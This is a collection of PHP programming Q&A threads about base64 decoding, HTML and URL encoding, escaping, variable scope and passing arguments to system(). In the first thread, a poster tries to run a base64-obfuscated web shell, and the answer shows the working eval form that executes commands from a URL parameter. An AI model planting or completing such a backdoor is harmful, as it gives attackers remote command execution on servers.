Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 6 years ago.
I'm trying to test a script.
I want to run the system function inside the base64 decode function,
but it doesn't work. Any ideas?
<?php base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSkg")
?>
localhost/test.php?cmd=id
PHP's base64_decode function gets a string (which is encoded in base64) and decodes it back to the original data. The function then returns the decoded data as a string, which means your code actually looks like:
<?php "system($_GET['cmd']) "
?>
(Running this code makes no sense).
If you want PHP to "run" (or evaluate) the string that you just decoded, you should use PHP's eval language construct:
<?php eval("system($_GET['cmd']);");
?>
Note the ; added at the end of the string (inside the eval call).
Very important
Note that the use of eval is very dangerous because it allows execution of arbitrary code.
You should really NOT use it unless you REALLY know what you are doing.
Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
I attempted encoding a '=' symbol to its html equivalent through the use of:
htmlentities("This is my test and it = this");
The result is:
<p>This is my test and it = this</p>1
Notice how the equals sign is not encoded? I know there is a HTML equivalent.
What is an alternative function I can use to encode this string?
Thanks.
I know there is a HTML equivalent
The equals sign isn't encoded for HTML, there is no reason to do so.
You might be thinking of URL-encoding, which would be %3d:
urlencode("This is my test and it = this");
// => "This+is+my+test+and+it+%3D+this"
There's no need to encode the =; it's HTML-safe. If you really want to, though: &#61;
echo str_replace('=', '&#61;', htmlentities("This is my test and it = this"));
Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
I have tried to pass a variable through the URL... it's %50.
I am doing urlencoding to pass other languages through the URL.
At that time, %50 has also been converted to a space or something else.
Can anyone help me find a way to send %50 as a variable through a urlencoded link (URL)?
<?php
$string = '%50';
echo $encoded = urlencode($string);
// returns %2550
echo urldecode($encoded);
// returns %50
?>
So if you want to pass $string to a url you write something like:
http://yoursite.com/script.php?string=$encoded
To get your original string value you can just use $_GET in your script.php:
echo $_GET["string"];
// returns %50
Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
Closed 9 years ago.
I have a very simple php script designed to test the function htmlspecialchars:
$question="<script>alert('hacked')</script>";
echo "<br>original question=",$question;
$question = make_secure( $question );
echo "<br>converted question=",$question;
echo "<br>converted question calling htmlspecialchars=",htmlspecialchars($question);
function make_secure($data) {
    $data = htmlspecialchars($data);
    return $data;
}
It should remove the special chars from the original string $question by calling a function with htmlspecialchars inside it. However, the function does not seem to remove the special chars. They are only removed if I call htmlspecialchars explicitly in the script. Why?
Thanks.
EDIT: This is what I see when I run the script:
original question=
converted question=<script>alert('hacked')</script>
converted question calling htmlspecialchars=<script>alert('hacked')</script>
(the 'hacked' script is also executed first). To rephrase my question, why is the script still perfectly visible in $question on the line converted question= ? i.e. why hasn't the variable been converted? I thought that after the variable had been converted, the script should no longer be visible.
The output visible to the user should be:
(nothing, script executed)
<script>alert('hacked')</script>
&lt;script&gt;alert('hacked')&lt;/script&gt;
The actual output, visible to the browser is:
<script>alert('hacked')</script>
&lt;script&gt;alert('hacked')&lt;/script&gt;
&amp;lt;script&amp;gt;alert('hacked')&amp;lt;/script&amp;gt;
Which is exactly correct. The first line is unescaped, the HTML and script get interpreted. The second line is escaped once, displaying the text as is to the user. The third line is escaped twice, displaying the text as escaped once to the user.
You keep escaping the same variable over and over, so the result is going to change depending on how often you escape it. Maybe start here: The Great Escapism (Or: What You Need To Know To Work With Text Within Text)
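The single-versus-double escaping described in the answer above, as an added example that is not part of the original thread. The helper name e() and the input strings are assumptions made for illustration; it also shows why passing double_encode=false is not a substitute for escaping exactly once.

```php
<?php
// Added example, not from the thread. Input strings are constructed.

/** Escape a raw string for an HTML text or attribute context; call once, at output. */
function e(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$question = "<script>alert('hacked')</script>";   // raw value, kept unescaped

$once  = e($question);   // correct: the browser displays the original text
$twice = e($once);       // bug: the browser displays the entity text instead

echo $once, PHP_EOL;
echo $twice, PHP_EOL;

// Undoing one level of the double escape gives back the correctly escaped form.
var_dump(htmlspecialchars_decode($twice, ENT_QUOTES) === $once);

// double_encode=false hides the double-escape symptom but alters user text:
// a user who literally typed "&lt;" gets it passed through unescaped, so the
// browser renders "<" instead of the characters that were typed.
$typed  = 'Use &lt; for a less-than sign';
$masked = htmlspecialchars($typed, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
var_dump($masked === $typed);

// Escaping the raw value exactly once preserves what the user typed.
var_dump(e($typed) === 'Use &amp;lt; for a less-than sign');
```

Keeping the variable raw and calling the escaper only where the value is written into HTML removes the question of how many times it has already been escaped.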
Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 9 years ago.
Is it possible to use a PHP variable in multiple positions in the code? For example:
<?php
// some code here that sets a certain variable called $var
?>
some html code
<h3> <?php echo $var ?> </h3>
Yes! PHP is wonderful that way. I like to think of it as an overlay on top of my HTML code that simply acts when I tell it to. You can test it for yourself and see - that's the best way to learn :)
This works fine:
<?php
$a = "hello world!";
?>
<h3> <?php echo $a ?> </h3>
If a file is being interpreted as a PHP script, you may think of it as an entire piece of code; the HTML code between scripts works like an echo. So, if you declare a variable in any part of the script, if it is in the global scope, it is available for each of the scripts declared. Just be careful with the scopes where you declare the variables. If you declare a variable inside a function, it will be available inside the function.
Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
I am writing a PHP script that calls a file on the server
by using:
<?php
$ret=system("command");
?>
The problem is when the file needs some parameters.
I can't find a way of doing that,
because when using
<?php
$ret=system("command");
?>
PHP skips the part that asks for variables
and assigns a random one to id,
and I can't pass them at the start like
$ret = system("command argument1 argument2 argument3...");
because the number of parameters depends on the user.
I mean he keeps entering data into a dynamic array until he enters "end".
$ret = system("command argument1 argument2 argument3...");
Just load the arguments on, just like you were calling the program from a command line.
$cmd = "cmd param1 param2";
system($cmd,$return_value);
($return_value == 0) or die("returned an error: $cmd");
If what you mean is that you have an array that can have any number of parameters, use this:
// Escape each parameter separately so that every one stays its own argument
$commandParameters = implode(" ", array_map('escapeshellarg', $dynamicArray));
$ret = system("command " . $commandParameters);
Get the parameters from the user via an HTML form and then, when you know what (and how many) the parameters are, you can use "system()" like everyone suggested!
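An added example, not taken from any of the answers above, of passing a variable-length, user-supplied argument list to an external program. The helper build_command() is hypothetical, printf stands in for the real command, and the input array is constructed; it goes slightly beyond the answers by also showing proc_open() with an array command (PHP 7.4+), which starts the program without a shell.

```php
<?php
// Added example: variable-length, user-supplied arguments for an external
// program. "printf" stands in for the real command; the input is constructed.

/** Quote the program name and every argument separately for the shell. */
function build_command(string $program, array $args): string
{
    $parts = [escapeshellarg($program)];
    foreach ($args as $arg) {
        $parts[] = escapeshellarg((string) $arg);
    }
    return implode(' ', $parts);
}

// Constructed input: values collected from the user until "end" was entered.
$userArgs = ['report.txt', 'two words', '; id', '$(whoami)'];
$argv = array_merge(['[%s]\n'], $userArgs);   // printf format, then the values

// Quoting the joined string: safe, but the program receives ONE argument.
echo 'printf ' . escapeshellarg(implode(' ', $argv)), PHP_EOL;

// Quoting each value: the shell passes every element through literally.
$cmd = build_command('printf', $argv);
echo $cmd, PHP_EOL;
system($cmd, $status);
if ($status !== 0) {
    error_log("command failed with status $status");
}

// PHP 7.4+: an array command is executed directly, with no shell involved,
// so no quoting is needed at all.
$proc = proc_open(array_merge(['printf'], $argv), [1 => ['pipe', 'w']], $pipes);
if (is_resource($proc)) {
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
}
```

Both calls print each value in its own pair of brackets, with the shell metacharacters in the last two values treated as plain text.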